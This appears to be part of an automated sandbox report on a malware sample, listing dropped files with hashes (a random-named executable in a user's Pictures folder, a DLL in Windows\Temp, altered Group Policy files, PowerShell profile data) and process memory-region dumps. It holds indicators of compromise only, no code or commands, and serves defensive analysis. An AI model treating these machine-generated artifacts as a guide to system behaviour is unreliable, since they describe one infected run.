                                                                                                                                                                                                                                      1fb6d951265c037103aa2165a5cbf19961fd3ef1ff8017e461682b6666ce3898

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      0c02d70eb04c5618ccf9ac500bec427cbcd3a26e54567535c0b4b19c8d3ab6b04c8ee893a3e0da7861cfca0c652b330ac682f8eae091b225f2a824723bc5b568

                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\z3SMMh2XirGULjgTpREzk5Bg.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      218KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      c5a6381354cd5d1488e362c9103c1851

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      3d87bc60f2c8a74bcd0295af4edf02d9486be3b5

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      b69cf7aec22182a247d52d76c200a78128cccafa246dedafc8898824db7424f9

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      2c22149b37041ae844f3a12459c8a7ea837b1f62e0f54d4c9fc188d823433b92497ab697f841c05d958a758a9a2b69ac0ddb779659b19721feed54b4c5736ce7

                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      15KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      463465ce3d5d541576cbdc2edd990453

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      d249df1cb09aebe259fdddbc5dd061cde17bbfff

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      166bdd6c0216dd0d4f246a138515fe6671e9880a3a5d3199a18550ba7da49f50

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      732448539dd784ef71318f93d2c4cd5b8e76a48e2da5c49eee2fcb178c11799edd4a07c7ee03fff236ca819ab6b023cf12eca37799404e6417543754fb2bc668

                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      58277e66b5c4e3985acabb277852fe76

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      6630a510ecaf55db7d746c7eff63883f8e934d96

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      32b0d864133ce4ce995c24bd97d364db082738c07729c9d2570efc9d6f489610

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      4fbf761e2967fc76e0f59bd8a933afbb0a4163f44e55dc4034de9205bfdb7e0635d009c55538f6daf9f61ab372975e8ec2a9c37ab0128e1d7a301dfa36ed32f8

                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      8fbb921b98f53129f885ea3b3fcea45d

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      cc6c24171504f7f3461263879eef7c5b48183107

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      37dfbc96ffdcb80023368dc6be6bd8cb4be896e1ee723a7fc23212d9dbf5be91

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      6b7300ccff9f9f6343a6f5a6908d1c040cbfef1a614c53900454f76b2308e003c4416f5142ea09c4d08ae903695fd45aacba339662331aef91c17508d334f56e

                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      15KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      4e92eb420edd4f66899b51ea6144089e

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      5defec9888fa304fb91bdbd286798da7fb03a047

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      2432cdae17dce62c6dc4ac1c7a149ba8a72732322481782604d4d2cace0ce9d6

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      c2cdcaf48e569595339b5736317fbc8247032209c08a042179463d2910870a8ebf5186eea26afb5b6fc439e6146fd6227863cb7300aaf6a2aa7d842f0af2af1a

                                                                                                                                                                                                                                    • C:\Windows\System32\GroupPolicy\gpt.ini
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      127B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      8ef9853d1881c5fe4d681bfb31282a01

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      a05609065520e4b4e553784c566430ad9736f19f

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

                                                                                                                                                                                                                                    • C:\Windows\Temp\WPGfhLqOzAIwKSwi\ehzEXrbV\lOfaEKa.dll
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      1b6f605e52d8d5a8af93f68a4d95d242

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      e363d00b83fae91a5c96a050269a2d3ad875e371

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      eea74134d0dba14e77cb5400922724de84fcda62f54b9adc86b161dda730626d

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      3656d3297ed181f9d44e2f10158e0bb7ba7ff9f90f092bba5b4ff97319e2125a50f3155064bf8d26c588d1c2e90e1ff236b9c4e2a01e2ce02d8a47f53a15c040

                                                                                                                                                                                                                                    • C:\Windows\system32\GroupPolicy\Machine\Registry.pol
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      cdfd60e717a44c2349b553e011958b85

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      431136102a6fb52a00e416964d4c27089155f73b

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

                                                                                                                                                                                                                                    • C:\Windows\system32\GroupPolicy\Machine\Registry.pol
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      9ef3a5da486ecf6f1cba6be369aa8671

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      19d8bf295294bf5d8869f6ee7f5d7a76fb2bba2e

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      774af9687e91b6c4507aaefe4493926403cea01c08ae280ddb6eb335454e5fe2

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      2dbb04a05d3673ac5d81f67133e77e8990cc20984cea44d006daed42e060b968ba0022803d54d69b07bc51a0c954b4b085d18ee844d6c28d0e402030b4f174c7

                                                                                                                                                                                                                                    • C:\Windows\system32\GroupPolicy\gpt.ini
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      268B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                                                                                                    • memory/232-262-0x0000000004E10000-0x0000000004E5C000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                    • memory/232-260-0x0000000004870000-0x0000000004BC4000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                    • memory/1052-209-0x0000000004810000-0x0000000004B64000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                    • memory/1068-11-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      10.8MB

                                                                                                                                                                                                                                    • memory/1068-18-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      10.8MB

                                                                                                                                                                                                                                    • memory/1068-12-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      10.8MB

                                                                                                                                                                                                                                    • memory/1068-0-0x00007FFDAE393000-0x00007FFDAE395000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                    • memory/1068-6-0x0000017E7E870000-0x0000017E7E892000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                    • memory/1084-687-0x0000000002030000-0x000000000260D000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                                                    • memory/1108-180-0x0000000074BAE000-0x0000000074BAF000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/1108-193-0x0000000074BA0000-0x0000000075350000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                    • memory/1108-19-0x0000000074BA0000-0x0000000075350000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                    • memory/1108-15-0x0000000074BAE000-0x0000000074BAF000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/1108-14-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                    • memory/1640-175-0x0000000005EF0000-0x0000000005F3C000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                    • memory/1640-169-0x0000000005710000-0x0000000005A64000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                    • memory/1940-160-0x0000000010000000-0x00000000105DD000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                                                    • memory/1940-731-0x00000000002B0000-0x000000000091E000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                    • memory/1940-135-0x00000000002B0000-0x000000000091E000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                    • memory/1940-239-0x00000000002B0000-0x000000000091E000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                    • memory/1980-99-0x0000000140000000-0x0000000140DF9000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      14.0MB

                                                                                                                                                                                                                                    • memory/1980-100-0x0000000140000000-0x0000000140DF9000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      14.0MB

                                                                                                                                                                                                                                    • memory/1980-176-0x0000000140000000-0x0000000140DF9000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      14.0MB

                                                                                                                                                                                                                                    • memory/1980-102-0x0000000140000000-0x0000000140DF9000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      14.0MB

                                                                                                                                                                                                                                    • memory/1980-98-0x0000000140000000-0x0000000140DF9000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      14.0MB

                                                                                                                                                                                                                                    • memory/1980-101-0x0000000140000000-0x0000000140DF9000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      14.0MB

                                                                                                                                                                                                                                    • memory/2644-68-0x0000000000400000-0x0000000002C96000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      40.6MB

                                                                                                                                                                                                                                    • memory/2728-250-0x00000000002B0000-0x000000000091E000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                    • memory/2728-241-0x00000000002B0000-0x000000000091E000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                    • memory/2728-181-0x00000000002B0000-0x000000000091E000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                    • memory/2728-195-0x0000000010000000-0x00000000105DD000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                                                    • memory/2916-140-0x0000000005FC0000-0x0000000006026000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                                    • memory/2916-136-0x0000000002D50000-0x0000000002D86000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      216KB

                                                                                                                                                                                                                                    • memory/2916-153-0x0000000006700000-0x000000000674C000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                    • memory/2916-152-0x0000000006650000-0x000000000666E000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                    • memory/2916-154-0x0000000007770000-0x0000000007806000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      600KB

                                                                                                                                                                                                                                    • memory/2916-138-0x0000000005DF0000-0x0000000005E12000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                    • memory/2916-155-0x0000000007700000-0x000000000771A000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                    • memory/2916-156-0x0000000007810000-0x0000000007832000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                    • memory/2916-137-0x00000000057C0000-0x0000000005DE8000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.2MB

                                                                                                                                                                                                                                    • memory/2916-157-0x0000000007DF0000-0x0000000008394000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                    • memory/2916-139-0x0000000005F50000-0x0000000005FB6000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                                    • memory/2916-150-0x0000000006030000-0x0000000006384000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                    • memory/3108-307-0x0000000004DE0000-0x0000000004E2C000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                    • memory/3916-327-0x0000000002CE0000-0x0000000002D41000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      388KB

                                                                                                                                                                                                                                    • memory/3916-264-0x0000000010000000-0x00000000105DD000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                                                    • memory/3916-657-0x00000000034E0000-0x0000000003561000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      516KB

                                                                                                                                                                                                                                    • memory/3916-672-0x0000000003570000-0x000000000364E000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      888KB

                                                                                                                                                                                                                                    • memory/3916-275-0x00000000024D0000-0x0000000002555000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      532KB

                                                                                                                                                                                                                                    • memory/3916-249-0x0000000000470000-0x0000000000ADE000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                                    • memory/3916-740-0x0000000000470000-0x0000000000ADE000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.4MB